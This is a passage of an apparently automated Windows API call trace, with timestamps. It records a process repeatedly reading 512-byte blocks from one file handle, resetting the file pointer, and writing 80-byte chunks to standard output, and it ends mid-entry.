1 [0098.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.635] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] GetFileType (hFile=0x4c) returned 0x1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] GetFileType (hFile=0x4c) returned 0x1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] GetFileType (hFile=0x4c) returned 0x1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] GetFileType (hFile=0x4c) returned 0x1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] GetFileType (hFile=0x4c) returned 0x1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] GetFileType (hFile=0x4c) returned 0x1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] GetFileType (hFile=0x4c) returned 0x1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] GetFileType (hFile=0x4c) returned 0x1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.636] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.636] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] GetFileType (hFile=0x4c) returned 0x1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] GetFileType (hFile=0x4c) returned 0x1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] GetFileType (hFile=0x4c) returned 0x1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] GetFileType (hFile=0x4c) returned 0x1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] GetFileType (hFile=0x4c) returned 0x1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] GetFileType (hFile=0x4c) returned 0x1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] GetFileType (hFile=0x4c) returned 0x1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] GetFileType (hFile=0x4c) returned 0x1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.637] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.637] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.637] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.637] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] GetFileType (hFile=0x4c) returned 0x1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] GetFileType (hFile=0x4c) returned 0x1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] GetFileType (hFile=0x4c) returned 0x1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] GetFileType (hFile=0x4c) returned 0x1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] GetFileType (hFile=0x4c) returned 0x1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] GetFileType (hFile=0x4c) returned 0x1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] GetFileType (hFile=0x4c) returned 0x1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] GetFileType (hFile=0x4c) returned 0x1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.638] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.638] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] GetFileType (hFile=0x4c) returned 0x1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] GetFileType (hFile=0x4c) returned 0x1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] GetFileType (hFile=0x4c) returned 0x1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] GetFileType (hFile=0x4c) returned 0x1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] GetFileType (hFile=0x4c) returned 0x1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] GetFileType (hFile=0x4c) returned 0x1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] GetFileType (hFile=0x4c) returned 0x1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.639] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.639] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.640] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.640] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] GetFileType (hFile=0x4c) returned 0x1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] GetFileType (hFile=0x4c) returned 0x1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] GetFileType (hFile=0x4c) returned 0x1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] GetFileType (hFile=0x4c) returned 0x1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] GetFileType (hFile=0x4c) returned 0x1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] GetFileType (hFile=0x4c) returned 0x1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] GetFileType (hFile=0x4c) returned 0x1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] GetFileType (hFile=0x4c) returned 0x1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.641] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.641] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] GetFileType (hFile=0x4c) returned 0x1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] GetFileType (hFile=0x4c) returned 0x1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] GetFileType (hFile=0x4c) returned 0x1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] GetFileType (hFile=0x4c) returned 0x1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] GetFileType (hFile=0x4c) returned 0x1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] GetFileType (hFile=0x4c) returned 0x1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] GetFileType (hFile=0x4c) returned 0x1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] GetFileType (hFile=0x4c) returned 0x1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.642] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.642] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] GetFileType (hFile=0x4c) returned 0x1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] GetFileType (hFile=0x4c) returned 0x1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] GetFileType (hFile=0x4c) returned 0x1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, 